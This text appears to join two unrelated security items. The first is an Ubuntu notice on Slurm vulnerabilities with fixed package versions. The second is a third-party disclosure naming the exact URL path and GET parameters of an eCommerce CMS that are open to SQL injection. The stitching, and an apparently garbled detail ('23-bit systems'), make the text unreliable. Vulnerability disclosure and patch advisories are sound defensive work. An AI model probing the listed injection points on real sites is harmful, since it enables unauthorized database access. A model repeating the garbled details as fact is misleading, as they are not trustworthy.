  It was discovered that Slurm incorrectly handled certain messages  
  between the daemon and the user. An attacker could possibly use this  
  issue to assume control of an arbitrary file on the system. This  
  issue only affected Ubuntu 16.04 ESM.  
  (CVE-2016-10030)

  It was discovered that Slurm mishandled SPANK environment variables.  
  An attacker could possibly use this issue to gain elevated privileges.  
  This issue only affected Ubuntu 16.04 ESM. (CVE-2017-15566)

  It was discovered that Slurm mishandled certain SQL queries. A local  
  attacker could use this issue to gain elevated privileges. This  
  issue only affected Ubuntu 14.04 ESM, Ubuntu 16.04 ESM and  
  Ubuntu 18.04 ESM. (CVE-2018-7033)

  It was discovered that Slurm mishandled user names and group ids. A local  
  attacker could use this issue to gain administrative privileges.  
  This issue only affected Ubuntu 14.04 ESM and Ubuntu 18.04 ESM.  
  (CVE-2018-10995)

  It was discovered that Slurm mishandled 23-bit systems. A local attacker  
  could use this to gain administrative privileges. This issue only affected  
  Ubuntu 14.04 ESM, Ubuntu 16.04 ESM and Ubuntu 18.04 ESM. (CVE-2019-6438)

  It was discovered that Slurm incorrectly handled certain inputs  
  when Message Aggregation is enabled. An attacker could possibly  
  use this issue to launch a process as an arbitrary user.  
  This issue only affected Ubuntu 16.04 ESM, Ubuntu 18.04 ESM  
  and Ubuntu 20.04 ESM. (CVE-2020-12693)

  It was discovered that Slurm incorrectly handled certain RPC inputs.  
  An attacker could possibly use this issue to execute arbitrary code.  
  This issue only affected Ubuntu 18.04 ESM and Ubuntu 20.04 ESM.  
  (CVE-2020-27745)

  Jonas Stare discovered that Slurm exposes sensitive information related  
  to the X protocol. An attacker could possibly use this issue to obtain  
  a graphical session from an arbitrary user. This issue only affected  
  Ubuntu 18.04 ESM and Ubuntu 20.04 ESM. (CVE-2020-27746)

  It was discovered that Slurm incorrectly handled environment parameters.  
  An attacker could possibly use this issue to execute arbitrary code.  
  (CVE-2021-31215)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
   libpam-slurm                    15.08.7-1ubuntu0.1~esm5  
   libpmi0                         15.08.7-1ubuntu0.1~esm5  
   libslurm-perl                   15.08.7-1ubuntu0.1~esm5  
   libslurm29                      15.08.7-1ubuntu0.1~esm5  
   libslurmdb-perl                 15.08.7-1ubuntu0.1~esm5  
   libslurmdb29                    15.08.7-1ubuntu0.1~esm5  
   slurm-client                    15.08.7-1ubuntu0.1~esm5  
   slurm-client-emulator           15.08.7-1ubuntu0.1~esm5  
   slurm-llnl                      15.08.7-1ubuntu0.1~esm5  
   slurm-llnl-slurmdbd             15.08.7-1ubuntu0.1~esm5  
   slurm-wlm                       15.08.7-1ubuntu0.1~esm5  
   slurm-wlm-basic-plugins         15.08.7-1ubuntu0.1~esm5  
   slurm-wlm-emulator              15.08.7-1ubuntu0.1~esm5  
   slurm-wlm-torque                15.08.7-1ubuntu0.1~esm5  
   slurmctld                       15.08.7-1ubuntu0.1~esm5  
   slurmd                          15.08.7-1ubuntu0.1~esm5  
   slurmdbd                        15.08.7-1ubuntu0.1~esm5  
   sview                           15.08.7-1ubuntu0.1~esm5

Ubuntu 14.04 ESM:  
   libpam-slurm                    2.6.5-1ubuntu0.1~esm6  
   libpmi0                         2.6.5-1ubuntu0.1~esm6  
   libslurm-perl                   2.6.5-1ubuntu0.1~esm6  
   libslurm26                      2.6.5-1ubuntu0.1~esm6  
   libslurmdb-perl                 2.6.5-1ubuntu0.1~esm6  
   libslurmdb26                    2.6.5-1ubuntu0.1~esm6  
   slurm-llnl                      2.6.5-1ubuntu0.1~esm6  
   slurm-llnl-basic-plugins        2.6.5-1ubuntu0.1~esm6  
   slurm-llnl-slurmdbd             2.6.5-1ubuntu0.1~esm6  
   slurm-llnl-sview                2.6.5-1ubuntu0.1~esm6  
   slurm-llnl-torque               2.6.5-1ubuntu0.1~esm6

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-4781-2  
   https://ubuntu.com/security/notices/USN-4781-1  
   CVE-2016-10030, CVE-2018-10995

Ubuntu Security Notice USN-4781-2

eCommerce Marketplace Platform CMS version 1.7 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : mybizcms.com                                                               ││  Vendor   : MyBizCMS                                                                   ││  Software : Emporium Multi-Vendor - eCommerce Marketplace Platform CMS 1.7             ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /categories/phones/categories/phones?min_price=2485[SQLI]&max_price=145000[SQLI]&brand[]=16&review_ratings=5&a4tech-brand[]=50[SQLI]&battery[]=44[SQLI]&storage[]=41[SQLI]&display[]=37[SQLI]&performance[]=36[SQLI]&attribute3[]=7[SQLI]GET parameter 'min_price' is vulnerable to SQLIGET parameter 'max_price' is vulnerable to SQLIGET parameter 'a4tech-brand[]' is vulnerable to SQLIGET parameter 'battery[]' is vulnerable to SQLIGET parameter 'display[]' is vulnerable to SQLIGET parameter 'performance[]' is vulnerable to SQLIGET parameter 'attribute3[]' is vulnerable to SQLI[-] Done

Tag

#sql